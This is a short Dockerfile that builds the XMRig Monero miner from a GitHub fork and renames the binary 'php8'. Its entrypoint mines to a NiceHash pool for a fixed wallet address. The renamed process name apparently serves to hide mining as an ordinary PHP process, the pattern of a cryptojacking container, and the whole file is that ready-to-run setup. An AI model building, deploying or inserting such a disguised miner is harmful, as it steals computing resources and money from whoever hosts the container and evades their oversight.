FROM ubuntu:16.04

WORKDIR /app

RUN apt-get update
RUN apt-get install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
RUN git clone https://github.com/bdklz/xmrig.git /app
RUN mkdir /app/build
RUN cmake .
RUN make
RUN cp xmrig php8



ENTRYPOINT  ["./php8 -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 3EGw8DBdPMu26r8KD3V348Xwd5UdzgWqQG -p x -k --nicehash -a rx/0"]
